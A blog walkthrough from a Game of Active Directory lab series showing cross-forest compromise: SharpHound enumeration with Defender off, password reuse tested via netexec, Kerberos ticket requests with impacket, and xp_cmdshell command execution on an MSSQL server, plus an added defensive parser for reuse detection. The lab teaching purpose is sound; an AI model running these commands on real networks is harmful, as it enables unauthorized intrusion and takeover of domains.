Game of Active Directory part 3.3 – Persistence, Privilege Escalation & Lateral Movement – Cross Forest.
Foreword: This blog series shows real methods attackers use to move into, and take over, an AD environment. All of this information is already publicly available, and it is not shared to give a beginner's course in cybercrime, but to spread knowledge about why we must protect ourselves. You must only use these tools, methods and procedures in environments where the owner has given you explicit consent to do so.
In the previous post we gained full control over the entire sevenkingdoms.local AD forest. In this post we will cross over into essos.local by abusing the forest trust in AD.
Enumerating attack paths
We turn off Defender, run SharpHound.exe and collect information about possible attack paths into essos.local:
PS C:\tmp> .\SharpHound.exe
2025-10-04T14:02:31.6129671-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-10-04T14:02:31.6910954-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-10-04T14:02:31.7067204-07:00|INFORMATION|Initializing SharpHound at 2:02 PM on 10/4/2025
2025-10-04T14:02:31.7223489-07:00|INFORMATION|Resolved current domain to sevenkingdoms.local
2025-10-04T14:02:31.8160907-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-10-04T14:02:31.8629693-07:00|INFORMATION|Beginning LDAP search for sevenkingdoms.local
2025-10-04T14:02:31.9410915-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEVENKINGDOMS.LOCAL
2025-10-04T14:02:32.2379734-07:00|INFORMATION|Beginning LDAP search for sevenkingdoms.local Configuration NC
2025-10-04T14:02:32.2379734-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEVENKINGDOMS.LOCAL
2025-10-04T14:02:32.6285977-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-10-04T14:02:32.6442219-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-10-04T14:02:36.9408560-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-10-04T14:02:36.9408560-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-10-04T14:02:37.0189775-07:00|INFORMATION|Status: 366 objects finished (+366 73.2)/s -- Using 87 MB RAM
2025-10-04T14:02:37.0189775-07:00|INFORMATION|Enumeration finished in 00:00:05.1580981
2025-10-04T14:02:37.0658549-07:00|INFORMATION|Saving cache with stats: 34 ID to type mappings.
1 name to SID mappings.
1 machine sid mappings.
4 sid to domain mappings.
0 global catalog mappings.
2025-10-04T14:02:37.0814798-07:00|INFORMATION|SharpHound Enumeration Completed at 2:02 PM on 10/4/2025! Happy Graphing!
We also enumerate essos.local by running SharpHound a second time, this time specifying -d essos.local:
PS C:\tmp> .\SharpHound.exe -d essos.local
2025-10-04T14:09:52.5512713-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-10-04T14:09:52.6293949-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-10-04T14:09:52.6450198-07:00|INFORMATION|Initializing SharpHound at 2:09 PM on 10/4/2025
2025-10-04T14:09:53.0043984-07:00|INFORMATION|Loaded cache with stats: 34 ID to type mappings.
1 name to SID mappings.
1 machine sid mappings.
4 sid to domain mappings.
0 global catalog mappings.
2025-10-04T14:09:53.1293985-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2025-10-04T14:09:53.1918987-07:00|INFORMATION|Beginning LDAP search for essos.local
2025-10-04T14:09:53.2700164-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ESSOS.LOCAL
2025-10-04T14:09:53.3481429-07:00|INFORMATION|[CommonLib ACLProc]Found GUID for ACL Right ms-mcs-admpwd: e583a781-3311-412c-a86b-9b5a513970b6 in domain ESSOS.LOCAL
2025-10-04T14:09:53.6137704-07:00|INFORMATION|Beginning LDAP search for essos.local Configuration NC
2025-10-04T14:09:54.0356380-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-10-04T14:09:54.0512619-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-10-04T14:09:56.4106701-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-10-04T14:09:56.4262463-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-10-04T14:09:56.4895143-07:00|INFORMATION|Status: 375 objects finished (+375 125)/s -- Using 79 MB RAM
2025-10-04T14:09:56.4895143-07:00|INFORMATION|Enumeration finished in 00:00:03.3102631
2025-10-04T14:09:56.5520217-07:00|INFORMATION|Saving cache with stats: 61 ID to type mappings.
2 name to SID mappings.
2 machine sid mappings.
8 sid to domain mappings.
0 global catalog mappings.
2025-10-04T14:09:56.5520217-07:00|INFORMATION|SharpHound Enumeration Completed at 2:09 PM on 10/4/2025! Happy Graphing!
Analysing attack paths
We log in to BloodHound and upload the zip files we got from SharpHound for analysis.

We wait for BloodHound to finish chewing through the data; in this case it takes about one minute.

Once both data collections have been ingested, we can check “Data Quality” to see what we have collected.

Foothold in Essos
We need to gain a foothold in essos.local, and there are several ways to do that. Even though an AD forest is supposed to be a security boundary, it is very easy to make a few mistakes and end up in a situation where threat actors can quickly spread beyond the original AD forest.
In this case I primarily want to point out how serious password reuse is, so the focus falls on compromise via a reused password that we found earlier.
It turns out that the sql_svc account password we found in the MSSQL configuration files on castelblack in north.sevenkingdoms.local has also been used on an account with the same name, which runs MSSQL on braavos.essos.local.
We can see this if we scan for MSSQL services on the network with the known username and password, using the tool netexec:
$ netexec mssql 10.3.2.10-30 -u sql_svc -p "YouWillNotKerboroast1ngMeeeeee"
MSSQL 10.3.2.22 1433 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)
MSSQL 10.3.2.23 1433 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local)
MSSQL 10.3.2.22 1433 CASTELBLACK [+] north.sevenkingdoms.local\sql_svc:YouWillNotKerboroast1ngMeeeeee (Pwn3d!)
MSSQL 10.3.2.23 1433 BRAAVOS [+] essos.local\sql_svc:YouWillNotKerboroast1ngMeeeeee (Pwn3d!)
Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
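As an added example (not part of the original post), here is a small Python parser that reads netexec output like the lines above and flags any credential that authenticated in more than one domain, which is exactly the cross-forest password reuse the post exploits. The sample lines are constructed from the post's output plus a made-up failed login on a made-up host; the function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the netexec output in the post; the
# 10.3.2.24 / EXAMPLEHOST failure line is made up to show a non-matching line.
NETEXEC_OUTPUT = r"""
MSSQL 10.3.2.22 1433 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)
MSSQL 10.3.2.23 1433 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local)
MSSQL 10.3.2.22 1433 CASTELBLACK [+] north.sevenkingdoms.local\sql_svc:YouWillNotKerboroast1ngMeeeeee (Pwn3d!)
MSSQL 10.3.2.23 1433 BRAAVOS [+] essos.local\sql_svc:YouWillNotKerboroast1ngMeeeeee (Pwn3d!)
MSSQL 10.3.2.24 1433 EXAMPLEHOST [-] essos.local\other_svc:WrongPassword (Login failed)
"""

# One successful ([+]) netexec login line:
#   <protocol> <ip> <port> <host> [+] DOMAIN\user:password [(Pwn3d!)]
LOGIN_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\+\]\s+"
    r"(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<password>.*?)"
    r"(?:\s+\((?P<flag>[^)]*)\))?\s*$"
)


def parse_successful_logins(text):
    """Return one dict per [+] line; banners ([*]) and failures ([-]) are skipped."""
    hits = []
    for line in text.splitlines():
        m = LOGIN_RE.match(line.strip())
        if not m:
            continue
        hits.append({
            "protocol": m["proto"], "ip": m["ip"], "host": m["host"],
            "domain": m["domain"].lower(), "user": m["user"].lower(),
            "password": m["password"],
            "admin": m["flag"] == "Pwn3d!",   # netexec marks admin-level access this way
        })
    return hits


def find_cross_domain_reuse(hits):
    """Map (user, password) -> sorted list of domains where that credential worked,
    keeping only credentials valid in more than one domain (reuse across a trust)."""
    domains_by_cred = defaultdict(set)
    for h in hits:
        domains_by_cred[(h["user"], h["password"])].add(h["domain"])
    return {cred: sorted(d) for cred, d in domains_by_cred.items() if len(d) > 1}


def report(text):
    """Human-readable findings; the password itself is deliberately not echoed."""
    lines = []
    for (user, _pw), domains in find_cross_domain_reuse(parse_successful_logins(text)).items():
        lines.append(f"password reuse: {user} is valid in {', '.join(domains)}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(NETEXEC_OUTPUT)))
```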
We confirm that we can log on to the MSSQL server with sql_svc and “YouWillNotKerboroast1ngMeeeeee” by first requesting a Kerberos Ticket-Granting Ticket from the Kerberos Key Distribution Center in essos.local, then pointing KRB5CCNAME at the TGT.
$ impacket-getTGT essos.local/sql_svc:YouWillNotKerboroast1ngMeeeeee
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in sql_svc.ccache
$ export KRB5CCNAME=/home/kali/Documents/goad-lab/sql_svc.ccache
We then connect to the MSSQL service on braavos.essos.local with impacket-mssqlclient, specifying that we want to use our Kerberos ticket to gain access.
$ impacket-mssqlclient -k -no-pass braavos.essos.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BRAAVOS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BRAAVOS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (ESSOS\sql_svc dbo@master)> ?
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonated
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
upload {from} {to} - uploads file {from} to the SQLServer host {to}
show_query - show query
mask_query - mask query
We are now inside the Microsoft SQL service on braavos.essos.local as the sql_svc user.
The first thing we want to do is make sure xp_cmdshell is enabled.
SQL (ESSOS\sql_svc dbo@master)> enable_xp_cmdshell
INFO(BRAAVOS\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BRAAVOS\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
We can now run cmd.exe commands on braavos via the MSSQL server.
SQL (ESSOS\sql_svc dbo@master)> xp_cmdshell whoami
output
-------------
essos\sql_svc
NULL
SQL (ESSOS\sql_svc dbo@master)> xp_cmdshell hostname
output
-------
braavos
NULL
BloodHound redux
Why did I bother scanning with SharpHound and feeding the data into BloodHound if it isn't going to be used? Well, because I decided to go for a more mundane attack path halfway through. I had originally intended to demonstrate attack vectors that have more to do with domain trusts, foreign security principals and so on, but ended up going for something as simple as password abuse.
So as not to let this data go to waste, we can take a look at what BloodHound suggests for the way forward.

We mark sql_svc as compromised and search for the shortest paths to Enterprise Administrator in essos.local.
SQL_SVC is a member of Domain Users, which can exploit the ADCSESC1 vulnerability to take over all of essos.local; that gives us control of the Administrators group, which in turn gives us the right to add ourselves to Enterprise Admins.
SQL_SVC is also SQLAdmin on braavos.essos.local, as we have seen, and we have obtained a shell on that server. This server is set up as the certificate server for essos.local, so we can carry out a “Golden Certificate” attack to take control of essos.local, and thereby once again make ourselves owners of all of essos.local.
BloodHound is one of the tools I use regularly to map vulnerabilities, and here we can see an example from this Game of Active Directory lab of what comes up when I search for “shortest path to tier zero / domain admin”.

Reflections
We see how weak configurations can compromise not just an entire AD forest; in many cases we can also cross into other AD forests via various attack paths, sometimes through things as mundane as reused passwords. Even when the password is strong to begin with, that helps very little once the password has leaked.
It is also worth noting that Active Directory does not salt passwords when storing them in its database, so the same password will produce the same hash in any AD anywhere in the world. This means that lists of millions of known password:hash combinations circulate online, and as we have also seen, we can often attack with pass-the-hash regardless, so it is not always necessary to crack the password as long as the hash has been captured in an environment with inadequate SMB signing.
In the next post we will look at how we can abuse misconfigurations in Active Directory Certificate Services to compromise all of essos.local.